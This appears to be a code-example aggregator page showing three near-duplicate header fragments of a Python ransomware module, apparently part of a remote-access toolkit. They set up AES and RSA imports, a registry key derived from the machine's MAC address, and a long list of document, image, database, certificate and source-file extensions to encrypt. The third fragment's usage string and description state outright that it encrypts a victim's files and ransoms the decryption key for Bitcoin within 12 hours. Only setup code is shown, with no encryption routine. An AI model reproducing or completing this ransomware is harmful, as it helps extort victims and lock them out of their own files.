Beispiel #1
0
import Cryptodome.Cipher.PKCS1_OAEP
if sys.platform == 'win32':
    import _winreg

# utilities
import util
import security

# globals
packages = [
    '_winreg', 'Cryptodome.PublicKey.RSA', 'Cryptodome.Cipher.PKCS1_OAEP'
]
platforms = ['win32']
threads = {}
tasks = Queue.Queue()
registry_key = md5.new(util.mac_address()).hexdigest()
filetypes = [
    '.pdf', '.zip', '.ppt', '.doc', '.docx', '.rtf', '.jpg', '.jpeg', '.png',
    '.img', '.gif', '.mp3', '.mp4', '.mpeg', '.mov', '.avi', '.wmv', '.rtf',
    '.txt', '.html', '.php', '.js', '.css', '.odt', '.ods', '.odp', '.odm',
    '.odc', '.odb', '.doc', '.docx', '.docm', '.wps', '.xls', '.xlsx', '.xlsm',
    '.xlsb', '.xlk', '.ppt', '.pptx', '.pptm', '.mdb', '.accdb', '.pst',
    '.dwg', '.dxf', '.dxg', '.wpd', '.rtf', '.wb2', '.mdf', '.dbf', '.psd',
    '.pdd', '.pdf', '.eps', '.ai', '.indd', '.cdr', '.jpe', '.jpeg', '.tmp',
    '.log', '.py', '.dng', '.3fr', '.arw', '.srf', '.sr2', '.bay', '.crw',
    '.cr2', '.dcr', '.rwl', '.rw2', '.pyc', '.kdc', '.erf', '.mef', '.mrw',
    '.nef', '.nrw', '.orf', '.raf', '.raw', '.r3d', '.ptx', '.css', '.pef',
    '.srw', '.x3f', '.der', '.cer', '.crt', '.pem', '.pfx', '.p12', '.p7b',
    '.p7c', '.html', '.css', '.js', '.rb', '.xml', '.wmi', '.sh', '.asp',
    '.aspx', '.plist', '.sql', '.vbs', '.ps1', '.sqlite'
]
Beispiel #2
0
# packages
import Crypto.Cipher.AES
import Crypto.PublicKey.RSA
import Crypto.Cipher.PKCS1_OAEP
if sys.platform == 'win32':
    import _winreg

# utilities
import util

# globals
packages = ['_winreg', 'Crypto.PublicKey.RSA', 'Crypto.Cipher.PKCS1_OAEP']
platforms = ['win32']
threads = {}
tasks = Queue.Queue()
registry_key = hashlib.md5(util.mac_address()).hexdigest()
filetypes = [
    '.pdf', '.zip', '.ppt', '.doc', '.docx', '.rtf', '.jpg', '.jpeg', '.png',
    '.img', '.gif', '.mp3', '.mp4', '.mpeg', '.mov', '.avi', '.wmv', '.rtf',
    '.txt', '.html', '.php', '.js', '.css', '.odt', '.ods', '.odp', '.odm',
    '.odc', '.odb', '.doc', '.docx', '.docm', '.wps', '.xls', '.xlsx', '.xlsm',
    '.xlsb', '.xlk', '.ppt', '.pptx', '.pptm', '.mdb', '.accdb', '.pst',
    '.dwg', '.dxf', '.dxg', '.wpd', '.rtf', '.wb2', '.mdf', '.dbf', '.psd',
    '.pdd', '.pdf', '.eps', '.ai', '.indd', '.cdr', '.jpe', '.jpeg', '.tmp',
    '.log', '.py', '.dng', '.3fr', '.arw', '.srf', '.sr2', '.bay', '.crw',
    '.cr2', '.dcr', '.rwl', '.rw2', '.pyc', '.kdc', '.erf', '.mef', '.mrw',
    '.nef', '.nrw', '.orf', '.raf', '.raw', '.r3d', '.ptx', '.css', '.pef',
    '.srw', '.x3f', '.der', '.cer', '.crt', '.pem', '.pfx', '.p12', '.p7b',
    '.p7c', '.html', '.css', '.js', '.rb', '.xml', '.wmi', '.sh', '.asp',
    '.aspx', '.plist', '.sql', '.vbs', '.ps1', '.sqlite'
]
Beispiel #3
0
# packages
import Crypto.Cipher.AES
import Crypto.PublicKey.RSA
import Crypto.Cipher.PKCS1_OAEP
if sys.platform == 'win32':
    import _winreg

# utilities
import util

# globals
packages = ['_winreg','Crypto.PublicKey.RSA','Crypto.Cipher.PKCS1_OAEP']
platforms = ['win32']
threads = {}
tasks = Queue.Queue()
registry_key = hashlib.md5(util.mac_address()).hexdigest()
filetypes = ['.pdf','.zip','.ppt','.doc','.docx','.rtf','.jpg','.jpeg','.png','.img','.gif','.mp3','.mp4','.mpeg',
	     '.mov','.avi','.wmv','.rtf','.txt','.html','.php','.js','.css','.odt', '.ods', '.odp', '.odm', '.odc',
             '.odb', '.doc', '.docx', '.docm', '.wps', '.xls', '.xlsx', '.xlsm', '.xlsb', '.xlk', '.ppt', '.pptx',
             '.pptm', '.mdb', '.accdb', '.pst', '.dwg', '.dxf', '.dxg', '.wpd', '.rtf', '.wb2', '.mdf', '.dbf',
             '.psd', '.pdd', '.pdf', '.eps', '.ai', '.indd', '.cdr', '.jpe', '.jpeg','.tmp','.log','.py',
             '.dng', '.3fr', '.arw', '.srf', '.sr2', '.bay', '.crw', '.cr2', '.dcr', '.rwl', '.rw2','.pyc',
             '.kdc', '.erf', '.mef', '.mrw', '.nef', '.nrw', '.orf', '.raf', '.raw',  '.r3d', '.ptx','.css',
             '.pef', '.srw', '.x3f', '.der', '.cer', '.crt', '.pem', '.pfx', '.p12', '.p7b', '.p7c','.html',
             '.css','.js','.rb','.xml','.wmi','.sh','.asp','.aspx','.plist','.sql','.vbs','.ps1','.sqlite']
usage = 'ransom <encrypt/decrypt/payment>'
description = """
Encrypt the files on a client host machine and ransom the decryption key
back to the currently logged-in user for a payment in Bitcoin to a randomly
generated temporary wallet address that expires in 12 hours
"""